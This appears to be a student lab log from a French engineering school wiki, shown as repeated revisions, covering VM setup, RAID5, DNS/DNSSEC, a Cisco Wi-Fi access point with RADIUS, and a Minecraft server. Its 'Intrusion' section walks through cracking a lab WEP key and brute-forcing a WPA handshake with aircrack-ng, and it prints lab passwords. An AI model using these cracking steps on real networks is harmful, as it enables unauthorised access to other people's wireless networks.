 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Vérification&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Tester DNSSEC : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz.net ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60451</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60451"/>
				<updated>2022-11-30T22:51:31Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Cahier de suivi - Groupe 1 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Vérification&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
